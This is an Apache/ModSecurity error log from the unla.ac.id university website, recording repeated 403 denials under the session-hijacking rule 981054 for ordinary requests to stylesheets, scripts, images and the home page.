[Mon Aug 28 08:12:09.680660 2023] [:error] [pid 38114] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green.css"] [unique_id "ZOv0acCo-f0AAJTincQAAAAE"]
[Mon Aug 28 08:12:09.687573 2023] [:error] [pid 37539] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg.css"] [unique_id "ZOv0acCo-f0AAJKjaAQAAAAG"]
[Mon Aug 28 08:12:09.711924 2023] [:error] [pid 38196] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style100.css"] [unique_id "ZOv0acCo-f0AAJU0qcUAAAAD"]
[Mon Aug 28 08:12:09.849485 2023] [:error] [pid 38303] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/dark100.css"] [unique_id "ZOv0acCo-f0AAJWfZJAAAAAI"]
[Mon Aug 28 08:12:09.857783 2023] [:error] [pid 37803] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/blue100.css"] [unique_id "ZOv0acCo-f0AAJOr99QAAAAL"]
[Mon Aug 28 08:12:09.867377 2023] [:error] [pid 38195] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/green100.css"] [unique_id "ZOv0acCo-f0AAJUz@nwAAAAM"]
[Mon Aug 28 08:12:09.867843 2023] [:error] [pid 38150] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/bg100.css"] [unique_id "ZOv0acCo-f0AAJUGIW0AAAAC"]
[Mon Aug 28 08:12:11.580025 2023] [:error] [pid 38065] [client 140.213.16.102] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0a8Co-f0AAJSxY0cAAAAH"]
[Mon Aug 28 08:13:33.554083 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv0vcCo-f0AAJXCvnsAAAAJ"]
[Mon Aug 28 08:13:33.560465 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv0vcCo-f0AAJSxY1YAAAAH"]
[Mon Aug 28 08:13:33.564222 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv0vcCo-f0AAJS7R7EAAAAB"]
[Mon Aug 28 08:13:33.589685 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0vcCo-f0AAJWfZKIAAAAI"]
[Mon Aug 28 08:13:33.590684 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0vcCo-f0AAJSxY1cAAAAH"]
[Mon Aug 28 08:13:33.590850 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0vcCo-f0AAJXCvnwAAAAJ"]
[Mon Aug 28 08:13:33.635248 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv0vcCo-f0AAJS7R7IAAAAB"]
[Mon Aug 28 08:13:33.642448 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv0vcCo-f0AAJWfZKMAAAAI"]
[Mon Aug 28 08:13:33.651056 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv0vcCo-f0AAJSxY1gAAAAH"]
[Mon Aug 28 08:13:33.670687 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0vcCo-f0AAJXCvn0AAAAJ"]
[Mon Aug 28 08:13:33.676628 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv0vcCo-f0AAJS7R7MAAAAB"]
[Mon Aug 28 08:13:33.691617 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv0vcCo-f0AAJWfZKQAAAAI"]
[Mon Aug 28 08:13:33.709602 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv0vcCo-f0AAJSxY1kAAAAH"]
[Mon Aug 28 08:13:33.716859 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv0vcCo-f0AAJXCvn4AAAAJ"]
[Mon Aug 28 08:13:33.724864 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv0vcCo-f0AAJS7R7QAAAAB"]
[Mon Aug 28 08:13:33.731668 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv0vcCo-f0AAJWfZKUAAAAI"]
[Mon Aug 28 08:13:33.736804 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0vcCo-f0AAJSxY1oAAAAH"]
[Mon Aug 28 08:13:33.762838 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv0vcCo-f0AAJXCvn8AAAAJ"]
[Mon Aug 28 08:13:33.771822 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv0vcCo-f0AAJSxY1sAAAAH"]
[Mon Aug 28 08:13:33.778864 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv0vcCo-f0AAJWfZKYAAAAI"]
[Mon Aug 28 08:13:33.782895 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv0vcCo-f0AAJS7R7UAAAAB"]
[Mon Aug 28 08:13:33.790819 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0vcCo-f0AAJXCvoAAAAAJ"]
[Mon Aug 28 08:13:33.810409 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv0vcCo-f0AAJSxY1wAAAAH"]
[Mon Aug 28 08:13:33.820008 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv0vcCo-f0AAJWfZKcAAAAI"]
[Mon Aug 28 08:13:33.827697 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv0vcCo-f0AAJS7R7YAAAAB"]
[Mon Aug 28 08:13:33.840109 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0vcCo-f0AAJXCvoEAAAAJ"]
[Mon Aug 28 08:13:33.854507 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv0vcCo-f0AAJSxY10AAAAH"]
[Mon Aug 28 08:13:33.895861 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv0vcCo-f0AAJS7R7cAAAAB"]
[Mon Aug 28 08:13:41.368501 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0xcCo-f0AAJTindkAAAAE"]
[Mon Aug 28 08:13:41.417408 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv0xcCo-f0AAJSxY18AAAAH"]
[Mon Aug 28 08:13:43.716231 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0x8Co-f0AAJWfZKoAAAAI"]
[Mon Aug 28 08:13:44.399416 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJS7R7oAAAAB"]
[Mon Aug 28 08:13:44.717576 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJOr9@8AAAAL"]
[Mon Aug 28 08:13:44.919128 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0yMCo-f0AAJKjaBwAAAAG"]
[Mon Aug 28 08:13:45.084091 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJXDU2UAAAAK"]
[Mon Aug 28 08:13:45.250652 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJSr2w4AAAAO"]
[Mon Aug 28 08:13:45.415301 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJTindsAAAAE"]
[Mon Aug 28 08:13:45.588768 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJSr2w8AAAAO"]
[Mon Aug 28 08:13:45.743693 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJS7R7sAAAAB"]
[Mon Aug 28 08:13:45.889248 2023] [:error] [pid 38340] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ycCo-f0AAJXEm@MAAAAM"]
[Mon Aug 28 08:13:46.062694 2023] [:error] [pid 38075] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ysCo-f0AAJS7R7wAAAAB"]
[Mon Aug 28 08:13:46.216048 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv0ysCo-f0AAJSr2xAAAAAO"]
[Mon Aug 28 08:13:51.283209 2023] [:error] [pid 37539] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv0z8Co-f0AAJKjaB0AAAAG"]
[Mon Aug 28 08:13:51.304695 2023] [:error] [pid 37803] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv0z8Co-f0AAJOr9-IAAAAL"]
[Mon Aug 28 08:13:51.313148 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv0z8Co-f0AAJSr2xIAAAAO"]
[Mon Aug 28 08:13:51.321210 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0z8Co-f0AAJWfZK0AAAAI"]
[Mon Aug 28 08:13:51.330793 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv0z8Co-f0AAJXDU2gAAAAK"]
[Mon Aug 28 08:13:51.340718 2023] [:error] [pid 38338] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv0z8Co-f0AAJXCvocAAAAJ"]
[Mon Aug 28 08:13:51.379427 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv0z8Co-f0AAJTind4AAAAE"]
[Mon Aug 28 08:13:51.389441 2023] [:error] [pid 38303] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv0z8Co-f0AAJWfZK4AAAAI"]
[Mon Aug 28 08:13:51.398601 2023] [:error] [pid 38150] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv0z8Co-f0AAJUGIYIAAAAC"]
[Mon Aug 28 08:13:51.407321 2023] [:error] [pid 38339] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv0z8Co-f0AAJXDU2kAAAAK"]
[Mon Aug 28 08:13:51.416452 2023] [:error] [pid 38065] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0z8Co-f0AAJSxY2EAAAAH"]
[Mon Aug 28 08:13:51.433397 2023] [:error] [pid 38059] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv0z8Co-f0AAJSr2xMAAAAO"]
[Mon Aug 28 08:13:51.447493 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv0z8Co-f0AAJTind8AAAAE"]
